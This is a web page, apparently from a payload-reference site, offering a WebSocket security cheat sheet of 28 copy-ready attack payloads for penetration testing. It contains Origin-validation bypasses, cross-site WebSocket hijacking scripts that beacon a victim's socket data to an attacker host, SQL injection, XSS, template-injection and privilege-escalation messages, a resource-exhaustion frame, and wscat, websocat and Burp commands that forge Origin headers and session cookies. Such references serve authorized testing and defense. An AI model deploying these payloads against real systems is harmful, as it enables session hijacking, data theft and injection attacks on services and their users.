WebSocket Security Cheat Sheet

Copy-ready WebSocket attack payloads and PoCs for authorized testing: CSWSH, origin-check bypass, message/auth injection, and wscat/Burp tooling. (28 payloads)

Build custom WebSocket payloads in the WebSocket Exploitation generator

Handshake & Origin Validation

(6)

GET /chat HTTP/1.1
Host: target.example.com
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Sec-WebSocket-Version: 13
Origin: https://target.example.com

Baseline RFC 6455 handshake. Capture the legitimate Upgrade request first so you know the required headers, subprotocols and cookies before tampering. A successful upgrade returns HTTP 101 Switching Protocols.RFC 6455 client handshake

Origin: https://attacker.example.com

Swap the Origin header in the handshake to an attacker-controlled domain. If the server still returns 101 and lets the socket exchange authenticated data, it does not validate Origin and is vulnerable to cross-site hijacking.Origin allowlist test

Origin: https://target.example.com.attacker.example.com

Tests weak suffix/substring Origin matching. Servers that check `endsWith('target.example.com')` or use a loose regex accept this attacker-owned domain.Origin regex / suffix bypass

Origin: https://eviltarget.example.com

Tests prefix/contains-style Origin matching. A check like `origin.includes('target.example.com')` is bypassed because the attacker domain contains the allowed string.Origin substring bypass

GET /chat HTTP/1.1
Host: target.example.com
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Sec-WebSocket-Version: 13

Send the handshake with the Origin header removed entirely. Some servers only validate Origin when present and treat a missing one as trusted (common with non-browser clients), allowing the connection.Null/absent Origin handling

Origin: null

Browsers send Origin: null from sandboxed iframes, data:/file: URLs and some redirects. If the server allowlists 'null', an attacker can trigger the connection from a sandboxed iframe.Sandboxed-iframe origin

Cross-Site WebSocket Hijacking (CSWSH)

(5)

<script>
  var ws = new WebSocket('wss://target.example.com/chat');
  ws.onopen = function () { ws.send('READY'); };
  ws.onmessage = function (e) {
    fetch('https://attacker.example.com/exfil?d=' + encodeURIComponent(e.data));
  };
</script>

Classic CSWSH PoC. Hosted on an attacker page; when a logged-in victim visits, the browser opens the socket with the victim's cookies (no Origin check + cookie auth) and every received message is exfiltrated. Confirms full session hijack.Cookie-authenticated WS, no Origin check

<script>
  var ws = new WebSocket('wss://target.example.com/chat');
  ws.onopen = function () {
    ws.send(JSON.stringify({action:'getChatHistory'}));
  };
  ws.onmessage = function (e) {
    new Image().src = 'https://attacker.example.com/c?d=' + btoa(e.data);
  };
</script>

CSWSH that actively pulls sensitive data: requests chat history over the hijacked socket and beacons each response out via an image GET (works even when CORS would block fetch reads).Data exfiltration via hijacked socket

const WebSocket = require('ws');
const ws = new WebSocket('wss://target.example.com/chat', {
  headers: { Cookie: 'session=VICTIM_SESSION_COOKIE', Origin: 'https://attacker.example.com' }
});
ws.on('open', () => ws.send('{"action":"whoami"}'));
ws.on('message', d => console.log('RECV:', d.toString()));

Node 'ws' client to reproduce CSWSH outside the browser: forge a stolen/known cookie plus a foreign Origin to confirm the server accepts cross-origin authenticated sockets. Useful for scripted PoCs and CI checks.Node.js ws library

<iframe sandbox="allow-scripts" srcdoc="&lt;script&gt;new WebSocket('wss://target.example.com/chat').onmessage=e=&gt;top.postMessage(e.data,'*')&lt;/script&gt;"></iframe>

Triggers the WebSocket from a sandboxed iframe so the handshake carries Origin: null. Demonstrates CSWSH against servers that (incorrectly) allowlist the null origin.Origin: null exploitation

<script>
  var ws = new WebSocket('wss://target.example.com/chat?token=' + (new URLSearchParams(location.search)).get('t'));
  ws.onmessage = e => fetch('//attacker.example.com/x?d=' + encodeURIComponent(e.data));
</script>

Variant for token-in-URL designs. If the WS auth token is logged, leaked via Referer, or guessable, an attacker can open an authenticated socket without the victim. Highlights that query-string tokens are not a safe substitute for CSRF defenses.Token-in-query auth

Authentication & Message Injection

(6)

{"action":"auth","token":"' OR '1'='1"}

SQL injection delivered inside a WebSocket message. WS frames often reach the same backend query logic as HTTP but skip WAF/middleware inspection, so injection sinks are frequently unfiltered.SQLi via WS message body

{"action":"setUser","username":"<img src=x onerror=alert(document.cookie)>"}

Stored/reflected XSS through a WS message. If the client renders message content with innerHTML, the payload executes when the server broadcasts it to other connected users.DOM XSS via broadcast message

{"action":"getProfile","userId":1337}

IDOR/BOLA over WebSocket. Increment or swap the object identifier in a message to access another user's data; WS endpoints are often less rigorously authorized than REST routes.Authorization test (IDOR)

{"action":"admin.deleteUser","userId":42}

Privilege-escalation probe: send a privileged action over an authenticated low-privilege socket. Servers that authorize only at connect time, not per-message, may execute it.Per-message authZ / privesc

{"username":"admin","password":"' OR 1=1-- -","action":"login"}

Authentication-bypass attempt sent over the socket. Tests whether the WS login handler reuses a vulnerable auth query or trusts client-supplied role fields.Auth bypass over WS

{"action":"subscribe","channel":"../admin/notifications"}

Path-traversal / channel-injection probe. Attempts to subscribe to an unauthorized topic by escaping the expected channel namespace.Pub/sub channel authorization

Message Tampering & Protocol Abuse

(6)

{"action":"transfer","from":"victim","to":"attacker","amount":0.01}

Replay/tamper an intercepted message with modified parameters. Using Burp Repeater's WebSocket history, alter recipient/amount and resend to test for missing server-side integrity or idempotency controls.Business-logic tampering

{"action":"updateCart","itemId":99,"price":0.00}

Client-trust test: change a value the server should authoritatively own (price, role, balance). Vulnerable backends accept the client-supplied value verbatim.Mass-assignment / price tampering

{"action":"message","text":"%n%n%n%s%s%s"}

Fuzz string for format-string and template-injection sinks reachable through WS handlers. Pair with SSTI markers (see below) to fingerprint the rendering engine.Format-string / fuzzing

{"action":"render","template":"${7*7}"}

Server-side template injection probe over WebSocket. A response containing 49 indicates the message content is evaluated by a template engine. Try {{7*7}} for Jinja/Twig-style engines.SSTI via WS message

AAAAAAAAAA...(large payload, e.g. 10MB single frame)

Resource-exhaustion / DoS test: send an oversized frame or rapid burst of frames to check for missing max-message-size limits and per-connection rate limiting. Keep volume within authorized scope.DoS / missing size limits

{"action":"ping","data":"�"}

Malformed-UTF-8 / unpaired-surrogate frame. RFC 6455 requires the server to fail the connection on invalid UTF-8 in text frames; lenient implementations may crash or mishandle it.Protocol conformance fuzzing

Tooling — wscat & Burp Suite

(5)

wscat -c wss://target.example.com/chat -H "Origin: https://attacker.example.com" -H "Cookie: session=VICTIM_SESSION"

Connect with wscat while forging Origin and cookies to manually reproduce CSWSH and interactively send/receive frames. Install via `npm install -g wscat`.wscat interactive client

wscat -c wss://target.example.com/chat --no-check -x '{"action":"whoami"}'

One-shot wscat: connect, send a single message with -x, and print the reply. `--no-check` skips TLS cert validation against self-signed test endpoints.wscat scripted single message

websocat -H='Origin: https://attacker.example.com' wss://target.example.com/chat

websocat alternative to wscat with richer framing/header control; pipe stdin for fuzzing or chain with other tools for automated frame replay.websocat CLI

Proxy > WebSockets history → right-click frame → Send to Repeater → edit JSON → Send

Burp Suite workflow: intercept the Upgrade, watch frames in the WebSockets history tab, then tamper and replay individual messages in Repeater. Burp's WebSocket Repeater is the core tool for manual message tampering.Burp Suite WebSocket Repeater

Proxy > Options > Intercept WebSocket messages (client-to-server / server-to-client)

Enable live interception of WS frames in Burp to modify messages in transit during an authorized session, e.g. inject payloads into an authenticated socket the victim opened.Burp live frame interception

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Generators

WebSocket Exploitation

Related Cheat Sheets

XSS Cheat Sheet CSRF Cheat Sheet CORS Misconfiguration Cheat Sheet

Frequently asked questions

What is the WebSocket Security Cheat Sheet?+

It's a quick-reference collection of 28 WebSocket payloads for testing WebSocket Security vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these WebSocket payloads?+

Copy any payload straight into your authorized test, or open the WebSocket Exploitation generator to build customized WebSocket variants with encoding and WAF-bypass options. Only test systems you have explicit permission to assess.

Are these WebSocket payloads free to use?+

Yes — this cheat sheet and all WebSocket payloads are completely free, with no account required. Everything runs in your browser.

$loading...

Frequently asked questions

What is the WebSocket Security Cheat Sheet?+

How do I use these WebSocket payloads?+

Are these WebSocket payloads free to use?+

Yes — this cheat sheet and all WebSocket payloads are completely free, with no account required. Everything runs in your browser.